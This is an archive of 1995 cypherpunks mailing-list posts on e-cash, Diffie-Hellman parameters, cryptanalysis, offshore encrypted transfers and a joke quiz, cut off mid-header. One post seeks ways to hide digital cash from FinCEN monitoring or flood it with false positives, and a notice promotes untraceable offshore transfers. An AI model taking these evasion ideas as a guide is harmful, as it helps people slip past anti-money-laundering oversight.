ENCRYPTED ON-LINE FINANCIAL TRANSACTIONS

are being offered by a Bahamian company, Offshore Assets
Reconciliation, Ltd.  As predicted by *SI*, the computer
encryption technique called PGP would result in commercial
services providing electronic transactions that are
indecipherable by any government agency.  OAR is in Nassau, and
can execute PGP instructions to move cash from bank or brokerage
accounts to bank, attorney, or escrow accounts.  It is equipped
to function throughout the Carribbean and in 20 international
financial centers such as Isle of Man, Bermuda, Cook Islands, and
Vanuatu.  For more information contact OAR at phone: (809) 356-
2039, fax: (809) 356-2095, e-mail: 71522.2715@compuserve.com. 
OAR is the first of many such services to come.


*Strategic Investment*, November 15, 1995

SI is published by Agora, Inc., 824 E. Baltimore St., Baltimore
MD  21202-4799





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 14 Nov 1995 23:28:27 +0800
To: cypherpunks@toad.com
Subject: U.S. Exit Tax - SI
Message-ID: <199511141046.EAA18231@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                  U.S.  EXIT TAXES
from Strategic Investment's Intelligence bulletins - November 15, 1995

Strategic Investment
824 E. Baltimore St.
Baltimre, MD 21202-4799

Published monthly for U.S. residents at US$109 per year.


   Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately
forecasted the coming of the "exit" tax proposed by the Clinton Admin-
istration earlier this year. Now Senate Republicans have passed an exit
tax that is even more punitive than that proposed by Clinton. Section
12441(b) of the Balanced Budget Reconciliation Act of 1995 (H.R. 2491)
adds a new layer of confiscatory taxes, succession taxes, to be imposed
upon U.S. citizens and residents. Unlike gift or estate taxes, which are
imposed upon the giver or his estate, succession taxes are imposed upon
the recipient of bequests. Under the Senate proposal, succession taxes
would be levied upon property acquired by gift or inheritance from a
former U.S. citizen or former long-term resident of the U.S. who leaves
U.S. tax jurisdiction after February, 1995. This tax would make it finan-
cially more punitive for an American to renounce his citizenship unless
his entire family came along. It would also make unattractive for foreign-
ers with close U.S. relatives to take up residence in the United States.
The would be subject ot confiscatory exit taxes upon leaving.

   (Questions arise - is there any legislation that Congress can't pass or
attempt to pass? Aren't Republicans supposted to be an alternative to
Democrates?) - GLJ






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 14 Nov 1995 08:57:48 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Admissions Test
Message-ID: <199511132350.AAA01105@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Due to the large number of new subscribers, cryptogroupies, journalists, and
conspiracy freaks currently posting to Cypherpunks, it has become necessary
to restrict posting privileges on the list.  If you are contemplating a
post to cypherpunks@toad.com, please take the following test FIRST to
determine if your knowledge of cryptography and cypherpunk methodology is
sufficient to allow your participation.

Simply pick the BEST answer to EACH question.  Scoring information is
provided at the end of the test.

1)  The "Cyphernomicon" is:

	a)  Tim May's >1mb rant on the social and technical possibilities
	    of the general adoption of strong crypto.
	b)  the cypherpunk FAQ.
	d)  the 'bible' of H.P.Lovecraft's Cthulhu Mythos. 
	d)  an ancient codebook once used by Julius Caesar.

2)  N.S.A stands for:

	a)  restricting the spread of strong crypto so they can spy on us
	    and keep their jobs.
	b)  No Such Agency or Not Saying Anything, I forget which.
	c)  the National Security Agency.
	d)  aren't they running the space program or something?

3)  If I wanted to keep my kid sister from reading my love letters, I'd:

	a)  encrypt them all with 128 bit key IDEA, keep them in a hidden
	    directory on an encrypted partition, keep a separate MD5 hash
	    for each one, put a firewall between the disk and the rest
            of my system, and then ...
	b)  use DES, cause it's already on my system.
	c)  use ROT 26 (TWICE as good as ROT 13, right?).
	d)  ite-wray em-thay in-ay ig-pay atin-lay.

4)  A good source of random numbers is:

	a)  radioactive decay interrupting a micro clock with a secure hash.
	b)  random mouse movements.
	c)  the system time, and the PID and PPID.
	d)  the state lottery.

5)  "Mod" stands for:

	a)  modulo.
	b)  "clock" arithmetic.
	c)  a weird kind of math that cypherpunks use to keep newbies
	    confused.
	d)  New, hip, cool.

6)   A "Certificate of Authority" is:

	a)  a type of identification that brings up all sorts of interesting
	    questions about identity, True Names, anonymity, reputations,
	    and how trustworthy electronic communication is in general.
	b)  a way of avoiding 'man in the middle' attacks.
	c)  a way to make six bucks a pop off everybody on the net.
	d)  something the Franklin Mint sends you with your hand-painted
	    limited edition Star Trek dinner plate.
    
7)  If Alice wants to send Bob her credit card number over the Internet,
    she should:

	a)  encrypt the file using at least a 2048 bit key, and transmit
	    it over a secure channel with at least application and IP level
	    encryption and authentication.
	b)  use PGP.
	c)  use a secure web server-client.
	d)  warn him ahead of time that she's going to send it backwards.

8)  If Mallet (RIP) needs to get Alice's password, he should:

	a)  hook five hundred computers together over the Internet and brute
	    force the Unix password system.
	b)  run a dictionary attack on /etc/passwd.
	c)  call her and pretend to be a system administrator.
	d)  copy it off the post-it note on her monitor.

9)  The cypherpunk motto, "Cypherpunks write code", means:

	a)  that cypherpunks are actively involved in spreading strong crypto.
	b)  that cypherpunks write programs, or maybe that they encode stuff.
	c)  that the cypherpunks mailing list is really a conspiracy to take
	    over the world, and the messages are really encoded instructions
	    to the various cells on when and where to strike.
	d)  that I can't understand 9/10ths of the things they post.

10)  On the cypherpunk list, the main medium of exchange is:

	a)  e-cash.
	b)  pgp encrypted mail.
	c)  the flame.
	d)  the T-shirt.

11)  A 'hash' is:

	a)  a function that converts an input string to a fixed size output
	    string.
	b)  a way of generating a 'digital fingerprint' of a file.
	c)  the thingie that the phone company calls a 'pound sign'.
	d)  those strange marks running down the middle of a football field.

12)  The 'munitions' T-shirt is:

	a)  a way to make the government look stupid.
	b)  a possible violation of ITAR.
	c)  a shirt with the RC4 algorithm in perl printed on the front.
	d)  a cool way to pick up intellectual chicks.

13)  ITAR, BTW, is:

	a)  a completely stupid, f*cked up way to try and stop the spread
	    of strong crypto, foisted on the world by the NSA and CIA.
	b)  the government rules restricting the export of munitions, including
	    cryptography.
	c)  the reason that I can get pgp faster from hacktic.nl than MIT.
	d)  Bob the Paver's motto over at Asphalt-R-Us.

14)  Blowfish is:

	a)  Bruce Schneier's new Feistel network symmetric encryption
	    algorithm.
	b)  a possible replacement for DES.
	c)  something I ran into in the PGPfone docs.
	d)  a good way to get food poisoning at a sushi bar.

15)  Steganography is:

	a)  the science of hiding messages in other messages.
	b)  a way of hiding information in a .gif of Cindy Crawford.
	c)  a way of hiding a nude .gif of Cindy Crawford in a fully
	    clothed .gif of Cindy Crawford.
	d)  the art of finding the cheat codes in games for the Stega
	    Genesis videogame machine.

16)  If you see a "MAKE MONEY FAST - HERE'S HOW" message, you should:

	a)  mail-bomb the offending idiot back to the abacus age.
	b)  send him several X-rated complaints via anonymous remailer.
	c)  write a polite but firm e-mail to his ISP.
	d)  forward it to cypherpunks and let the experts deal with it.

17)  A 'prime number' is:

	a)  a number evenly divisible by only one and itself.
	b)  a key component of RSA based public key encryption systems.
	c)  a number with particular properties useful in cryptography.
	d)  the blonde with the low-cut "munitions" tank-top at the local
	    espresso bar.

18)  The biggest problem with Chaum's e-cash is:

	a)  it's patented, and Chaum wants an exorbitant amount for licenses.
	b)  it protects Alice's anonymity, but not Bob's.
	c)  it's too complicated for Joe Sixpack to understand and trust.
	d)  all the free porno on the net will be pay-per-view.

19)  If a company releases a crypto product but refuses to release the
     underlying algorithms in order to protect it from attack, it's called:

	a)  snake oil.
	b)  security by obscurity.
	c)  a power one time pad.
	d)  Windows95. 

20)  A good example of a "nym" is:

	a)  Pr0duct Cypher   
	b)  Batman
	c)  Alice d'nonymous
	d)  the girl on the hotbabes IRC channel who turned out to be a guy.

To score your test, simply give yourself 4 points for each a) response, 
3 points for each b), 2 points for each c), and 1 point for each d).
Now add up your point total.  If your score is:

<20 	CLUE-REPELLANT  Try adding up your score again, and this time take
	off your shoes and socks.

20-39	CLUELESS NEWBIE  Read Tim May's "Cyphernomicon", Bruce Schneier's
	"Applied Cryptography", and the last three months archives of the
	cypherpunks mailing list - then take this test again.

40-59   YOU'RE READY  Go ahead and make your first post.  Of course, your
	ass'll get flamed anyway, but what do you care?  You've DONE your
	homework!

60-79	OLD-TIMER  You've obviously been on the list awhile, so keep on
	trucking!  

80	C'mon, Perry, why are you wasting your time on this crap?

Just e-mail this test, and your score, to:

ldetweiler@tentacles.r.us.org

You should be receiving your Cypherpunks Encoder Ring (tm) via e-mail within
three business days.      	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 14 Nov 1995 17:47:35 +0800
To: cypherpunks@toad.com
Subject: ssl-encrypted web server comparison
Message-ID: <199511140923.BAA12702@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've started a small summary of various features of encrypting
web servers that I know about. http://www.c2.org/apachessl#compare

	Please send your comments criticisms and suggestions. Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 Nov 1995 22:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <01HXM96ZFRDC8WXWOV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net 13-NOV-1995 02:25:05.47:

At 11:40 PM 11/11/95, Michael Pierson wrote:

>I wouldn't be surprised to learn of somebody like FinCEN using
>neural-net systems to do pattern analysis on funds transfers and
>the like, or the NRO or NSA investing research money into
>investigating the usefulness of NNs for image processing or for
>scanning raw ELIN SIGINT or COMINT data.  In fact, I'd be quite
>surprised if they weren't.

[...]

I recall reading of some contracts let out, and other RFCs, for AI
programs for FinCEN use. Not surprising. (If I ran FinCEN, this is
what I'd surely have a bunch of folks working on. Scary thought.)
------------------------

     I find it interesting that FinCEN has a net link (at
http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html). I have
heard about an IRS cash-tracking center in Detroit, where all those
$100+ cash deposits/withdrawals get sent. They probably use similar
setups for analysis, although with more of an individual focus.
     I have recently been contemplating how a private digital cash
system (either national-currency based or private-currency based)
would show up on such an analysis process. My suspicion is that it
would do so via fewer known non-cash transfers. Cash transactions
might actually increase, due to conversions between digital cash
and normal cash. On the other hand, many of those using a private
digital cash scheme may (like myself) tend to use mostly cash
anyway.
     I am interested in hearing the thoughts of others on this
subject. Particularly useful would be methods to stealth or spoof
such a system; i.e., to either hide a private digital cash system
from it, or to give it so many false positives that they couldn't
distinguish what is real and what is not. I suggest that the latter
would be easier (and would have other valuable applications).
     -Allen

P.S. Does anyone know what is up with the extropians list? Down
again, I suspect.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Tue, 14 Nov 1995 19:37:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <01HXMG5BM8V699JE2Z@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.

>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does. Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for
searching for useful nonrandom properties of the round functions of
block ciphers or hash functions?  This might be useful in trying to
prepare some new kind of attack, find a balanced binary function
that is useful in using the generalization of linear cryptanalysis
discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a
better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think.
Merkle comments that it's not going to be useful against a full
cipher, but that it might be useful against (say) Khufu with one or
two octets.

>#				Thanks;  Bill
># Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKhv1UHx57Ag8goBAQE5IAQAtV3GTqZO08WwHDJSI3Dj2NgIu7rQPrUH
V5vBCWTCvRsVNt07K8FbKMxPhF+QmXINPlOEMn4qZbhph0oyf/zAj3uV+6yzO3Eg
FMXrZzc1zOOdcfp9IcMvoXvd/av9zq/jH6Sn6yZB3jTO42ENeSSLNbxtaBrzgABl
zPklYWOnDrw=
=x3kP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 14 Nov 1995 09:02:19 +0800
To: cypherpunks@toad.com
Subject: 4096 bit strong prime for Diffle-Hellman
Message-ID: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



A bit of a ramble about Diffle-Hellman parameters.....

Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
(p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.
If any-one wants for testing the primality, please let
me know if it passes.  I'm currently using the Miller-Rabin primality
test with my own bignum library.
I'm just generating some 'default' DH parameter sets for distribution
with the next version of my crypto library (SSLeay), I'll send out Phil
Karn's 1024 and 2048 bit values and this one if other people are happy
with it.

Some quick times (in seconds) for the use of a 4096 bit prime with DH on a
SGI (200mhz R4400).  The RSA operation is PKCS#1 private key encrypt, the
DH operation is a PKCS#3 public/private key generation followed by the
generation of session key, the maths routines are from SSLeay.

modulus     DH     RSA
 512      0.23   0.041
1024      1.71   0.248
2048     12.88   1.702
4096    102.18  13.150

The RSA times as you will notice are about the same speed for twice the DH
bit size.  This is due to the RSA operation being reduced to 2 a^b%m
operation where m has the values of p and q where (p-1)*(q-1) is the RSA
modulus, half the bit size. The DH operation is 2 a^b%m operations,
(generating the 'public key' and then raising by the peer's public key). 
Does any-one know of any tricks to speeding the DH operation up (not
counting implementing a better a^b%m function, I'm going to do this later
when I have time :-).  From what I can see, there is not much that can be
done except perhaps some tricks in the initial g^rand%p, since the
generator is a known value. 

Even if the private DH values are pre-calculated, this will only halve the
time of the DH operation and if this is done it looses the advantage of DH
in that if the private/public pair are 'generated on the fly',
pre-recorded session will not be able to be decoded if the private key is
revealed at a later point in time.  This is the major advantage I can see
of a DH key exchange over the use of an RSA based system so I would 
object to loosing this feature. 

With these times I think that 4096 bit DH is not going to be used for
quite a while :-).

eric

The suspected 4096 bit strong prime.

In C, first byte is most significate (big endian)
unsigned char dh4096_p={
        0xFE,0xEA,0xD1,0x9D,0xBE,0xAF,0x90,0xF6,0x1C,0xFC,0xA1,0x06,
        0x5D,0x69,0xDB,0x08,0x83,0x9A,0x2A,0x2B,0x6A,0xEF,0x24,0x88,
        0xAB,0xD7,0x53,0x1F,0xBB,0x3E,0x46,0x2E,0x7D,0xCE,0xCE,0xFB,
        0xCE,0xDC,0xBB,0xBD,0xF5,0x65,0x49,0xEE,0x95,0x15,0x30,0x56,
        0x81,0x88,0xC3,0xD9,0x72,0x94,0x16,0x6B,0x6A,0xAB,0xA0,0xAA,
        0x5C,0xC8,0x55,0x5F,0x91,0x25,0x50,0x3A,0x18,0x0E,0x90,0x32,
        0x4C,0x7F,0x39,0xC6,0xA3,0x45,0x2F,0x31,0x42,0xEE,0x72,0xAB,
        0x7D,0xFF,0xC7,0x4C,0x52,0x8D,0xB6,0xDA,0x76,0xD9,0xC6,0x44,
        0xF5,0x5D,0x08,0x3E,0x9C,0xDE,0x74,0xF7,0xE7,0x42,0x41,0x3B,
        0x69,0x47,0x66,0x17,0xD2,0x67,0x0F,0x2B,0xF6,0xD5,0x9F,0xFC,
        0xD7,0xC3,0xBD,0xDE,0xED,0x41,0xE2,0xBD,0x2C,0xCD,0xD9,0xE6,
        0x12,0xF1,0x05,0x6C,0xAB,0x88,0xC4,0x41,0xD7,0xF9,0xBA,0x74,
        0x65,0x1E,0xD1,0xA8,0x4D,0x40,0x7A,0x27,0xD7,0x18,0x95,0xF7,
        0x77,0xAB,0x6C,0x77,0x63,0xCC,0x00,0xE6,0xF1,0xC3,0x0B,0x2F,
        0xE7,0x94,0x46,0x92,0x7E,0x74,0xBC,0x73,0xB8,0x43,0x1B,0x53,
        0x01,0x1A,0xF5,0xAD,0x15,0x15,0xE6,0x3D,0xC1,0xDE,0x83,0xCC,
        0x80,0x2E,0xCE,0x7D,0xFC,0x71,0xFB,0xDF,0x17,0x9F,0x8E,0x41,
        0xD7,0xF1,0xB4,0x3E,0xBA,0x75,0xD5,0xA9,0xC3,0xB1,0x1D,0x4F,
        0x1B,0x0B,0x5A,0x09,0x88,0xA9,0xAA,0xCB,0xCC,0xC1,0x05,0x12,
        0x26,0xDC,0x84,0x10,0xE4,0x16,0x93,0xEC,0x85,0x91,0xE3,0x1E,
        0xE2,0xF5,0xAF,0xDF,0xAE,0xDE,0x12,0x2D,0x12,0x77,0xFC,0x27,
        0x0B,0xE4,0xD2,0x5C,0x11,0x37,0xA5,0x8B,0xE9,0x61,0xEA,0xC9,
        0xF2,0x7D,0x4C,0x71,0xE2,0x39,0x19,0x04,0xDD,0x6A,0xB2,0x7B,
        0xEC,0xE5,0xBD,0x6C,0x64,0xC7,0x9B,0x14,0x6C,0x2D,0x20,0x8C,
        0xD6,0x3A,0x4B,0x74,0xF8,0xDA,0xE6,0x38,0xDB,0xE2,0xC8,0x80,
        0x6B,0xA1,0x07,0x73,0x8A,0x8D,0xF5,0xCF,0xE2,0x14,0xA4,0xB7,
        0x3D,0x03,0xC9,0x12,0x75,0xFB,0xA5,0x72,0x81,0x46,0xCE,0x5F,
        0xEC,0x01,0x77,0x5B,0x74,0x48,0x1A,0xDF,0x86,0xF4,0x85,0x4D,
        0x65,0xF5,0xDA,0x4B,0xB6,0x7F,0x88,0x2A,0x60,0xCE,0x0B,0xCA,
        0x0A,0xCD,0x15,0x7A,0xA3,0x77,0xF1,0x0B,0x09,0x1A,0xD0,0xB5,
        0x68,0x89,0x30,0x39,0xEC,0xA3,0x3C,0xDC,0xB6,0x1B,0xA8,0xC9,
        0xE3,0x2A,0x87,0xA2,0xF5,0xD8,0xB7,0xFD,0x26,0x73,0x4D,0x2F,
        0x09,0x67,0x92,0x35,0x2D,0x70,0xAD,0xE9,0xF4,0xA5,0x1D,0x84,
        0x88,0xBC,0x57,0xD3,0x2A,0x63,0x8E,0x0B,0x14,0xD6,0x69,0x3F,
        0x67,0x76,0xFF,0xFB,0x35,0x5F,0xED,0xF6,0x52,0x20,0x1F,0xA7,
        0x0C,0xB8,0xDB,0x34,0xFB,0x54,0x94,0x90,0x95,0x1A,0x70,0x1E,
        0x04,0xAD,0x49,0xD6,0x71,0xB7,0x4D,0x08,0x9C,0xAA,0x8C,0x0E,
        0x5E,0x83,0x3A,0x21,0x29,0x1D,0x69,0x78,0xF9,0x18,0xF2,0x5D,
        0x5C,0x76,0x9B,0xDB,0xE4,0xBB,0x72,0xA8,0x4A,0x1A,0xFE,0x6A,
        0x0B,0xBA,0xD1,0x8D,0x3E,0xAC,0xC7,0xB4,0x54,0xAF,0x40,0x8D,
        0x4F,0x1C,0xCB,0x23,0xB9,0xAE,0x57,0x6F,0xDA,0xE2,0xD1,0xA6,
        0x8F,0x43,0xD2,0x75,0x74,0x1D,0xB1,0x9E,0xED,0xC3,0xB8,0x1B,
        0x5E,0x56,0x96,0x4F,0x5F,0x8C,0x33,0x63,
        };
unsigned char dh4096_g={
        0x02,
        };

Or as a ASN.1 encoded pkcs#3 object.

-----BEGIN DH PARAMETERS-----
MIICCAKCAgEA/urRnb6vkPYc/KEGXWnbCIOaKitq7ySIq9dTH7s+Ri59zs77zty7
vfVlSe6VFTBWgYjD2XKUFmtqq6CqXMhVX5ElUDoYDpAyTH85xqNFLzFC7nKrff/H
TFKNttp22cZE9V0IPpzedPfnQkE7aUdmF9JnDyv21Z/818O93u1B4r0szdnmEvEF
bKuIxEHX+bp0ZR7RqE1AeifXGJX3d6tsd2PMAObxwwsv55RGkn50vHO4QxtTARr1
rRUV5j3B3oPMgC7Offxx+98Xn45B1/G0Prp11anDsR1PGwtaCYipqsvMwQUSJtyE
EOQWk+yFkeMe4vWv367eEi0Sd/wnC+TSXBE3pYvpYerJ8n1MceI5GQTdarJ77OW9
bGTHmxRsLSCM1jpLdPja5jjb4siAa6EHc4qN9c/iFKS3PQPJEnX7pXKBRs5f7AF3
W3RIGt+G9IVNZfXaS7Z/iCpgzgvKCs0VeqN38QsJGtC1aIkwOeyjPNy2G6jJ4yqH
ovXYt/0mc00vCWeSNS1wren0pR2EiLxX0ypjjgsU1mk/Z3b/+zVf7fZSIB+nDLjb
NPtUlJCVGnAeBK1J1nG3TQicqowOXoM6ISkdaXj5GPJdXHab2+S7cqhKGv5qC7rR
jT6sx7RUr0CNTxzLI7muV2/a4tGmj0PSdXQdsZ7tw7gbXlaWT1+MM2MCAQI=
-----END DH PARAMETERS-----

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 15 Nov 1995 13:54:59 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <199511112122.NAA02204@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 PM 11/9/95 -0800, jim bell wrote:

>I think that one thing that's needed is the concept of probabilistic payments.

Problem:  If the recipient verifies the coin infrequently, then someone 
can browse with slugs, accepting a modest probability of random URL
failure.

If the recipient verifies the coin regularly, then the cost of 
verification is still the same as ever.

Another poster earlier suggested the following solution, which seems
to me much better:  When you access the home page of the Playboy 
dirty pictures web site, you automatically buy a bunch of 
seemingly random numbers from them:  Every time you click on a 
URL, you spend one or more of their numbers.  If you have some 
left over when you are through, you can keep them or cash them.

This would mean two expensive transactions (high calculation and 
communication costs) per provider, instead of one expensive transaction
per click.

It also means that providers could make their tokens as cheap or expenisive
as they wished, down to microcents if they felt so inclined.

It also means that every shop around the world would be issuing 
their own money, making it impossible to trace anything in practice
even if everything was traceable in principle.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 13:53:20 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <Pine.SOL.3.91.951111130652.15607B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 11 Nov 1995, Robert Hettinga wrote:

> In the real world, there's a trustee/nominee of some sort who does this.
> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Nothing really;  It would probably be better to do some sort of secret 
sharing and use a number of somewhat trusted escrow-agents, but the 
protocols aren't too complex. 

For the simple case where the release is time based, you could even make 
the process totally automatic; just have the escrow agents send off their 
bits of the key when the time has expired, and voila.

As for real time-release - how about just using conventional encryption, 
and require it to be brute-forced?

Depending on how fine grained you want the release to be, you could also 
take the inverse of Moore's law, work out how big a key you need to have 
it unbreakable in less than the desired time, add in whatever fudge 
factors you feel like based on how much it would be worth to the opponent 
to get early access, then lock up the secret and throw away the key. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 15 Nov 1995 13:55:55 +0800
To: cypherpunks@toad.com
Subject: Re: the revolution of microcurrency
Message-ID: <9511112128.AA29071@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Thomas Junker (in reply to Vlad):

> this same idea works with software. you don't see
> software as an end product. you see it as something that
> is evolving over time. and whenever you send money to a
> company for software, in this new system the idea is that
> "I like this software, and I want to see it grow. here
> is my contribution to that".

People as marketplace players do not think like that.  
....................................................

This is a very important point to consider:  how a person as a customer will 
_actually_ think.  

It is easy enough to propose schemes based on one's preferences of how one 
would like a potential customer to make decisions about services, products, and 
methods of payment for what is offered.  But doing the customer's thinking for 
them doesn't automatically transform them into that line of reasoning.

To better compute whether they will proceed according to how you have imagined, 
it is more realistic to consider how the other person reasons on the 
circumstance they are facing - from their perspective.    

Market researchers actually carry out tests for consumer response and 
acceptance of products or payment schemes in order to gauge their success.  And 
there are many kinds of potential customers, who will make different decisions 
in regard of the same thing:  some will find it a good idea to think about 
software in terms of "contributing to its growth" in the longterm, but some 
will have immediate needs which they are trying to satisfy and may think "I 
need a solution to my problem *right now*" and will look for the 
product/service which will solve their problem as it stands in the present.

This is another attractive feature of "the free market":  in it one can find 
all sorts of schemes & methods for solving all sorts of problems in different 
ways.  There is no single type of consumer, no single circumstance, no one 
service or product or scheme which will satisfy everyone, equally, at all 
times.  

"May the Best Man Win", and "To the Victor Belong the Spoils".  <g>

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David A Wagner <daw@CS.Berkeley.EDU>
Date: Wed, 15 Nov 1995 13:59:53 +0800
To: weidai@eskimo.com
Subject: Re: Diffie-Hellman in GF(2^n)?
Message-ID: <199511122243.OAA18565@delhi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.951110184600.19312B-100000@eskimo.com> you write:
> Most Diffie-Hellman implementations currently use the multiplicative group
> of prime fields.  However, the multiplicative group of finite fields of
> characteristic 2 (GF(2^n)) can also be used and should be easier to
> implement.  Is there any reason why they should not be used?  Does anyone
> know the asymptotic running time of the best algorithm for calculating
> discrete logarithms in GF(2^n)? 

I remember that the discrete log problem is quite a bit easier
in GF(2^n), but I don't remember how much easier.   Let me try
to look it up...

A. Odlyzko has a paper recommending that people should not use
GF(2^n) for discrete log applications; in it he states that you
will need at the minimum n > 800, and probably n > 1500.  (And
you also need to choose n carefully.)  A quote from the abstract:

``Hence the fields GF(2^n) out to be avoided in all cryptographic
applications.''

I don't know enough about number theory to judge for myself;
but you can read the (long) paper yourself at

	ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z

I hope this helps!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 15 Nov 1995 06:09:44 +0800
To: "W. Kinney" <kinney@bogart.Colorado.EDU>
Subject: Re: ANNOUNCE: Curve Encrypt 2.2
In-Reply-To: <199511140336.UAA17922@bogart.Colorado.EDU>
Message-ID: <Pine.ULT.3.91.951113204535.2116G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Sounds cool, but...

I already have PGP on my Macs. Why would I want this?

I suppose one use might be in a public lab, where a secret key and
identity would be inappropriate. Or maybe to encrypt your PGP keychains if
you leave them on a physically insecure hard drive (though you could use
PGP conventional encryption for that). 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 15 Nov 1995 06:02:44 +0800
To: cypherpunks@toad.com
Subject: data compression
Message-ID: <Pine.OSF.3.91.951114000133.18347B-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Does any one have any information about or pointers to the data compression 
alogrithms used by Colorado Systems and/or any other QIC backup vendors?

Thanks,

Dan



 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vitamin <vitamin@best.com>
Date: Wed, 15 Nov 1995 01:16:41 +0800
To: cypherpunks@toad.com
Subject: Re: unsubcribe
Message-ID: <199511141535.HAA01352@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



unsubcribe









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 15 Nov 1995 01:15:46 +0800
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: U.S. Exit Tax - SI
In-Reply-To: <199511141046.EAA18231@mail.socketis.net>
Message-ID: <199511141326.IAA05233@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This is really not cypherpunks material at all. Post this sort of
thing to "Libernet", not to cypherpunks.

.pm

Gary Jeffers writes:
>                   U.S.  EXIT TAXES
> from Strategic Investment's Intelligence bulletins - November 15, 1995
> 
>    Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately
> forecasted the coming of the "exit" tax proposed by the Clinton Admin-
> istration earlier this year. Now Senate Republicans have passed an exit
> tax that is even more punitive than that proposed by Clinton. Section




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charles@europages.com
Date: Wed, 15 Nov 1995 11:11:45 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <9511140946.AA02846@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 15 Nov 1995 01:12:41 +0800
